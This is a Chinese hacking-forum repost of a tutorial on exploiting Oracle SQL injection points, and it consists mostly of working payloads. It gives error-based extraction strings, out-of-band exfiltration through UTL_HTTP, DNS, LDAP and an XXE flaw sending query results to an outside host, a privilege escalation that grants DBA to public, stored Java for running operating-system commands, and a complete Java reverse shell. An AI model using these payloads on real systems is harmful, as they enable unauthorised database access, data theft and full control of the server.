搜索
查看: 1277|回复: 0

Oracle Sql注入利用方法

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2018-1-30 11:22:59 | 显示全部楼层 |阅读模式
原文链接:https://www.iswin.org/2015/06/13/hack-oracle/

本文主要讨论在得到一枚oracle注入点时,如何通过Oracle自带函数或者缺陷获取数据,权限提升以及获得系统权限。
数据获取报错注入的几种方式0x1 utl_inaddr.get_host_name
这种方法在Oracle 8g,9g,10g中不需要任何权限,但是在Oracle 11g以及以后的版本中,官方加强了访问控制权限,所以在11g以后要使用此方法进行报错注入,当前数据库用户必须有网络访问权限。
  1. http://www.iswin.org/oracle.jsp?name=' and 1=utl_inaddr.get_host_name((select user from dual))--
复制代码
0x2 ctxsys.drithsx.sn

  1. http://www.iswin.org/oracle.jsp?name=' and 1=ctxsys.drithsx.sn(1,(select user from dual))--
复制代码
0x3 XMLType
在使用这个XMLType进行报错时,很多人不知道为什么要用chr(60),通过ascii查询可以看到,60:<,58:’:’,62:’>’,查了下相关的api,发现xmltype在进行解析的时候必须以<开头>结尾,这里:冒号在这是必不可少的,至于为什么是冒号这个我也没查到,另外需要注意的是如果返回的数据种有空格的话,它会自动截断,导致数据不完整,有replace函数替换成其他非空字符就可以。


  1. http://www.iswin.org/oracle.jsp?name=' and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null--
复制代码
0x4 dbms_xdb_version.checkin

  1. http://www.iswin.org/oracle.jsp?name=' and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null--
复制代码
0x5 dbms_xdb_version.makeversioned

  1. http://www.iswin.org/oracle.jsp?name=' and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null--
复制代码
0x6 dbms_xdb_version.uncheckout

  1. http://www.iswin.org/oracle.jsp?name=' and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null--
复制代码
0x7 dbms_utility.sqlid_to_sqlhash

  1. http://www.iswin.org/oracle.jsp?name=' and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null--
复制代码
UTL_HTTP.request的使用
通过utl_http.request我们可以将查询的结果发送到远程服务器上,在遇到盲注时非常有用,要使用该方法用户需要有utl_http访问网络的权限。


  1. http://www.iswin.org/oracle.jsp?name=' and (UTL_HTTP.request('http://www.iswin.org:80/'||(select banner from sys.v_$version where rownum=1))=1—
复制代码
UTL_INADDR.GET_HOST_ADDRESS&SYS.DBMS_LDAP.INIT
很多时候数据服务器都是站库分离的,而且不一定能出网,有时候可能会允许DNS请求,所以该方法能在一定情况下奏效。


  1. http://www.iswin.org/oracle.jsp?name=' and (select utl_inaddr.get_host_address((select user from dual)||'.iswin.org') from dual)is not null--&#65532;
复制代码
  1. http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_LDAP.INIT((select user from dual)||'.iswin.org') from dual)is not null--&#65532;
复制代码
Oracle XXE(CVE-2014-6577)
受影响版本:11.2.0.3, 11.2.0.4, 12.1.0.1 和12.1.0.2
这里Oracle的XXE的利用效果和UTL_http的效果差不多,都是将数据传输到远端服务器上,但是,由于extractvalue()函数对所有数据库用户都可以使用,不存在权限的问题,所以当在低权限没有UTL_http访问权限时,这个不失为一个好方法。


  1. http://www.iswin.org/oracle.jsp?name=' and (select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://172.16.10.1:8080/'||(SELECT user from dual)||'"> %remote;]>'),'/l') from dual) is not null
复制代码
Oracle 提权漏洞GET_DOMAIN_INDEX_TABLES函数注入漏洞
影响版本:Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2
漏洞的成因是该函数的参数存在注入,而该函数的所有者是sys,所以通过注入就可以执行任意sql,该函数的执行权限为public,所以只要遇到一个oracle的注入点并且存在这个漏洞的,基本上都可以提升到最高权限。
权限提升

  1. http://www.iswin.org/oracle.jsp?name=' and (SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS _OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant dba to public'''';END;'';END;--','SYS',0,'1',0)) is not null--
复制代码
权限提升之后就可以做很多事了,因为Oracle可以执行JAVA代码,所以在提升权限后具体怎么操作,就看各自的JAVA水平了。
这里给出几种常见的利用方式。
命令执行创建JAVA代码

  1. http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "Command" as import java.io.*;public class Command{public static String exec(String cmd) throws Exception{String sb="";BufferedInputStream in = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());BufferedReader inBr = new BufferedReader(new InputStreamReader(in));String lineStr;while ((lineStr = inBr.readLine()) != null)sb+=lineStr+"\n";inBr.close();in.close();return sb;}}'''';END;'';END;--','SYS',0,'1',0) from dual) is not null
复制代码
赋予JAVA执行权限

  1. http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
复制代码
创建函数

  1. http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function cmd(p_cmd in varchar2) return varchar2 as language java name ''''''''Command.exec(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
复制代码
赋予函数执行权限

  1. http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on cmd to public'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
复制代码
执行命令

  1. http://www.iswin.org/oracle.jsp?name=' and (select sys.cmd('cmd.exe /c whoami') from dual) is not null--
复制代码
反弹SHELL创建JAVA代码
当执行命令没有什么太大的帮助时,我们可以反弹一个交互式的shell,这样会方便很多。


  1. http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "shell" as import java.io.*;import java.net.*;public class shell{public static void run() throws Exception {Socket s = new Socket("172.16.10.1", 80);Process p = Runtime.getRuntime().exec("cmd.exe");new T(p.getInputStream(), s.getOutputStream()).start();new T(p.getErrorStream(), s.getOutputStream()).start();new T(s.getInputStream(), p.getOutputStream()).start();}static class T extends Thread {private InputStream i;private OutputStream u;public T(InputStream in, OutputStream out) {this.u = out;this.i = in;}public void run() {BufferedReader n = new BufferedReader(new InputStreamReader(i));BufferedWriter w = new BufferedWriter(new OutputStreamWriter(u));char f[] = new char[8192];int l;try {while ((l = n.read(f, 0, f.length)) > 0) {w.write(f, 0, l);w.flush();}} catch (IOException e) {}try {if (n != null)n.close();if (w != null)w.close();} catch (Exception e) {}}}}'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
复制代码
赋予JAVA执行权限

  1. http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.net.SocketPermission'''''''', ''''''''<>'''''''', ''''''''*'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
复制代码
创建函数
  1. http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function reversetcp RETURN VARCHAR2 as language java name ''''''''shell.run() return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
复制代码
赋予函数执行权限

  1. http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on reversetcp to public'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
复制代码
反弹SHELL

  1. http://www.iswin.org/oracle.jsp?name=' and (select sys.reversetcp from dual) is not null--
复制代码


过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表